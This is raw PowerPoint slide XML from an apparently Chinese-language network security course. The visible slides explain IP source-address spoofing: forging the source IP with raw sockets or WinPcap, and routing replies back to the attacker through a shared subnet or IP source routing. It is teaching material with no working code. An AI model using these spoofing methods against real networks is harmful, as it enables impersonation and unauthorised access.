          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包头填上假冒的源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Unix/Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>平台上，直接用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>就可以发送，但是需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>平台上，不能使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Winsock</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>winpcap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>注意：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>只能发送数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>收不到回包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>防火墙可能阻挡</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227330" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>用程序实现</a:t>
            </a:r>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7960E309-0538-4AB3-99DF-BDD707887AB9}"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7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273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273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73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273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73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7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utoUpdateAnimBg="0" build="p"/>
    </p:bld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371" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗的过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228370" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗：双向欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5B1B7F44-C13C-446A-AB56-1ED7BE19737C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="228374" name="Group 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3852863" y="2347913"/>
            <a:ext cx="1511300" cy="1538287"/>
            <a:chOff x="2336" y="2069"/>
            <a:chExt cx="952" cy="969"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="228363" name="Object 11"/>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326030" name="位图图像" r:id="rId1" imgW="1133475" imgH="1028700" progId="PBrush">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="位图图像" r:id="rId1" imgW="1133475" imgH="1028700" progId="PBrush">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 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6" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2336" y="2750"/>
              <a:ext cx="952"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攻击者</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>H</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="228380" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1541463" y="2384425"/>
            <a:ext cx="1133475" cy="1028700"/>
            <a:chOff x="612" y="1479"/>
            <a:chExt cx="4808" cy="969"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="228373" name="Group 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="612" y="1479"/>
              <a:ext cx="1134" cy="969"/>
              <a:chOff x="521" y="2069"/>
              <a:chExt cx="1134" cy="969"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="228360" name="Object 8"/>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326031" name="位图图像" r:id="rId3" imgW="1133475" imgH="1028700" progId="PBrush">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="位图图像" r:id="rId3" imgW="1133475" imgH="1028700" progId="PBrush">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="Picture 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5" name="Text Box 13"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="521" y="2750"/>
                <a:ext cx="1134"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被假冒者</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="228375" name="Group 23"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4377" y="1479"/>
              <a:ext cx="1043" cy="969"/>
              <a:chOff x="4286" y="2069"/>
              <a:chExt cx="1043" cy="969"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="228364" name="Object 12"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="4377" y="2069"/>
              <a:ext cx="714" cy="648"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s326032" name="位图图像" r:id="rId4" imgW="1133475" imgH="1028700" progId="PBrush">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="位图图像" r:id="rId4" imgW="1133475" imgH="1028700" progId="PBrush">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0"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7" name="Text Box 15"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4286" y="2750"/>
                <a:ext cx="1043"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目标机器</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>B</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="228381" name="Group 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5003800" y="2060575"/>
            <a:ext cx="2303463" cy="504825"/>
            <a:chOff x="3152" y="1298"/>
            <a:chExt cx="1451" cy="318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="228368" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3243" y="1615"/>
              <a:ext cx="1270" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="228372" name="Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3152" y="1298"/>
              <a:ext cx="1451"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假冒包：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>A -&gt; B</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="228382" name="Group 30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2339975" y="2997200"/>
            <a:ext cx="5040313" cy="457200"/>
            <a:chOff x="1474" y="1888"/>
            <a:chExt cx="3175" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="228376" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3198" y="1888"/>
              <a:ext cx="1451"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回应包：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>B -&gt; A</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="228377" name="Line 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1474" y="1888"/>
              <a:ext cx="2994" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="dash"/>
              <a:miter lim="800000"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228378" name="AutoShape 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="5364163" y="3932238"/>
            <a:ext cx="2017712" cy="1008062"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 46380"/>
              <a:gd name="adj2" fmla="val 102912"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rot="10800000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>能看到这个包吗？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228379" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="5029200"/>
            <a:ext cx="7486650" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>让回应包经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>在同一个子网内部</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>使用源路由选项</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin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3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8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8" grpId="0" animBg="1"/>
      <p:bldP spid="22837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日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248400"/>
            <a:ext cx="2133600" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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fld id="{0B015123-69E4-45B0-BD17-35E2AAA124FD}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28676" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击与防范</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28677" name="Group 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="981075"/>
            <a:ext cx="8659813" cy="5495925"/>
            <a:chOff x="0" y="618"/>
            <a:chExt cx="5455" cy="3462"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28678"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28679" name="Group 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3424" y="1728"/>
              <a:ext cx="1814" cy="499"/>
              <a:chOff x="3424" y="1728"/>
              <a:chExt cx="1814" cy="499"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28702"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28703"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sz="2400" b="1">
                    <a:solidFill>
                      <a:srgbClr val="CC0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>信息</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                  <a:solidFill>
                    <a:srgbClr val="CC0000"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="28680" name="Group 31"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="1751"/>
              <a:ext cx="2273" cy="1876"/>
              <a:chOff x="0" y="1751"/>
              <a:chExt cx="2273" cy="1876"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28698"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99" name="Group 8"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="1751"/>
                <a:ext cx="1331" cy="1876"/>
                <a:chOff x="0" y="1751"/>
                <a:chExt cx="1331" cy="1876"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="28700" name="Rectangle 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="385" y="3339"/>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b="1">
                      <a:solidFill>
                        <a:srgbClr val="CC0000"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>攻击者</a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                    <a:solidFill>
                      <a:srgbClr val="CC0000"/>
                    </a:solidFill>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="28701" name="Picture 10" descr="j02908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8681" name="Group 34"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3470" y="2473"/>
              <a:ext cx="1985" cy="983"/>
              <a:chOff x="3470" y="2473"/>
              <a:chExt cx="1985" cy="983"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28694"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95" name="Group 29"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4176" y="2473"/>
                <a:ext cx="1279" cy="983"/>
                <a:chOff x="4176" y="2473"/>
                <a:chExt cx="1279" cy="983"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:graphicFrame>
              <p:nvGraphicFramePr>
                <p:cNvPr id="28696"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626781" name="Visio" r:id="rId2" imgW="2426970" imgH="2201545" progId="Visio.Drawing.6">
                        <p:embed/>
                      </p:oleObj>
                    </mc:Choice>
                    <mc:Fallback>
                      <p:oleObj name="Visio" r:id="rId2" imgW="2426970" imgH="2201545" progId="Visio.Drawing.6">
                        <p:embed/>
                        <p:pic>
                          <p:nvPicPr>
                            <p:cNvPr id="0" name="图片 6267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spcBef>
                      <a:spcPct val="50000"/>
                    </a:spcBef>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="zh-CN" altLang="en-US" b="1">
                      <a:solidFill>
                        <a:srgbClr val="CC0000"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>信息</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0">
                      <a:solidFill>
                        <a:srgbClr val="CC0000"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>系统</a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                    <a:solidFill>
                      <a:srgbClr val="CC0000"/>
                    </a:solidFill>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="28682" name="Group 32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
